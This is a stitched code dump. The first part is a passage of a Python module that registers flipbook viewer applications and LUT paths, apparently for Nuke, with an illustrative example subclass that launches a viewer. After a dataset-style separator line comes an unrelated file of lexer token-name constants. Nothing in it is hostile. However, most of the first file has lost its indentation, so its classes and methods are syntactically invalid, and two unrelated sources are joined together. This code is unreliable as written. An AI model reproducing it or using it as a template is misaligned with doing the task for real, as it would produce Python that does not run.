"""Called whenever this flipbook is selected to retrieve extra options from the node selected to flipbook
and the flipbook dialog.
@param flipbookDialog: the flipbook dialog
@param nodeToFlipbook: node selected to flipbook
@return: a dictionary with the extra options """
return dict()
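# A minimal sketch of a concrete implementation (illustrative only; the class
# name, executable path, cache directory and capabilities below are hypothetical
# placeholders rather than an actual shipped flipbook):
class ExampleFlipbook(FlipbookApplication):
    def name(self):
        return "ExampleFlipbook"
    def path(self):
        return "/usr/local/bin/example_viewer"    # hypothetical viewer binary
    def cacheDir(self):
        return "/var/tmp/example_flipbook_cache"  # hypothetical render cache
    def run(self, path, frameRanges, views, options):
        # Launch the viewer on the rendered sequence; this sketch ignores the
        # frame ranges, views and extra options.
        import subprocess
        subprocess.Popen([self.path(), path])
    def capabilities(self):
        return {"canPreLaunch": False, "maximumViews": 1, "fileTypes": ["*"], "roi": False}
    def dialogKnobs(self, dialog):
        pass  # no custom knobs in this sketch
    def dialogKnobChanged(self, dialog, knob):
        pass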
class FlipbookFactory(object):
def __init__(self):
self._flipbookApplications = {}
def isRegistered(self, flipbook):
""" Return whether a flipbook app with that name has already been registered.
@param flipbook: FlipbookApplication object whose name is tested for.
@return: bool"""
return flipbook.name() in self._flipbookApplications
def register(self, flipbookApplication):
"""Register a flipbook app. It will fail if the flipbook app name isn't unique.
@param flipbookApplication: FlipbookApplication object to register
@return: None"""
if not self.isRegistered(flipbookApplication):
nuke.registerFlipbook(flipbookApplication.name())
self._flipbookApplications[flipbookApplication.name()] = flipbookApplication
else:
raise RuntimeError("Already registered a flipbook application with this name")
def getNames(self):
"""Returns a list of the names of all available flipbook apps.
@return: list"""
return sorted(self._flipbookApplications.keys())
def getApplication(self, name):
"""Returns the flipbook app implementation with the given name, raises an exception if none could be found.
@param name: The name of a flipbook that was registered.
@return: FlipbookApplication"""
if name in self._flipbookApplications:
return self._flipbookApplications[name]
else:
raise RuntimeError("Requested flipbook not registered")
class FlipbookLUTPathRegistry(object):
"""A registery of all LUT files against LUTs for each specific flipbook."""
def __init__(self):
self._luts = {}
def registerLUTPathForFlipbook(self, flipbook, lut, path):
"""Register the given LUT file.
@param flipbook: The unique name of the flipbook
@param lut: The unique name for the LUT, e.g. 'sRGB' and 'rec709'
@param path: Location of the flipbook specific file."""
if flipbook not in self._luts:
self._luts[flipbook] = {}
self._luts[flipbook][lut] = path
def getLUTPathForFlipbook(self, flipbook, lut):
"""Return the path for the given flipbook and lut. May return an empty string if none registered.
@param flipbook: The unique name of the flipbook
@param lut: The unique name for the LUT, e.g. 'sRGB' and 'rec709'"""
return self._luts.get(flipbook, {}).get(lut, "")
# Global registry of flipbooks.
gFlipbookFactory = FlipbookFactory()
# Global registry of user specified LUTs
gFlipbookLUTPathRegistry = FlipbookLUTPathRegistry()
# Convenience functions that make access to the globals a few key strokes less.
def register(flipbookApplication):
"""Register a flipbook. Convenience function that simple calls register() on the FlipbookFactory."""
gFlipbookFactory.register(flipbookApplication)
def registerLUTPath(flipbookApplication, lut, path):
"""Register a LUT for a specific flipbook. The path should refer to a file that contains the LUT for the given flipbook identified by the name in flipbookApplication. It is up to the flipbook subimplementation to actually use this file and the format may vary.
@param flipbook: The unique name of the flipbook
@param lut: The unique name for the LUT, e.g. 'sRGB' and 'rec709'
@param path: Location of the flipbook specific file."""
gFlipbookLUTPathRegistry.registerLUTPathForFlipbook(flipbookApplication, lut, path)
def getLUTPath(flipbookApplication, lut):
"""Returns the path to a LUT file for the given flipbook. The contents of the file will differ for each flipbook application; please see the relevant documentation for the specific flipbook applications.
@param flipbookApplication: The unique name of the flipbook
@param lut: The unique name for the LUT, e.g. 'sRGB' and 'rec709'"""
return gFlipbookLUTPathRegistry.getLUTPathForFlipbook(flipbookApplication, lut)
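# Illustrative usage of the convenience functions above (names and paths are
# hypothetical; ExampleFlipbook refers to the sketch subclass shown earlier):
#
#     register(ExampleFlipbook())
#     registerLUTPath("ExampleFlipbook", "sRGB", "/path/to/srgb.lut")
#     getLUTPath("ExampleFlipbook", "sRGB")   # -> "/path/to/srgb.lut"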
|
py | 1a4a31d147db3001df0688c85c84bc0bfb67110c | SPACE = 'space'
COMMENT = 'comment'
PLUS_ASSIGN = 'plus_assign'
PLUS = 'plus'
MOD_ASSIGN = 'mod_assign'
MOD = 'mod'
DIVISION_ASSIGN = 'div_assign'
DIVISION = 'div'
POW = 'pow'
MULT_ASSIGN = 'mult_assign'
MULT = 'mult'
NOT = 'not'
AND = 'and'
OR = 'or'
XOR = 'xor'
GREATER_EQUAL = 'greater_eq'
GREATER = 'greater'
LESS_EQUAL = 'less_eq'
LESS = 'less'
EQUAL = 'eq'
ASSIGN = 'assign'
NOT_EQUAL = 'not_eq'
BRACKET_OPEN = 'bracket_open'
BRACKET_CLOSE = 'bracket_close'
CURLY_BRACKET_OPEN = 'curly_bracket_open'
CURLY_BRACKET_CLOSE = 'curly_bracket_close'
SEMICOLON = 'semicolon'
CONCAT = 'concat'
ADD = 'add'
IF = 'if'
ELSE = 'else'
WHILE = 'while'
PRINT = 'print'
INPUT = 'input'
BOOL = 'bool'
STRING = 'string'
MINUS_ASSIGN = 'minus_assign'
FLOAT = 'float'
INT = 'int'
MINUS = 'minus'
VARIABLE = 'var'
|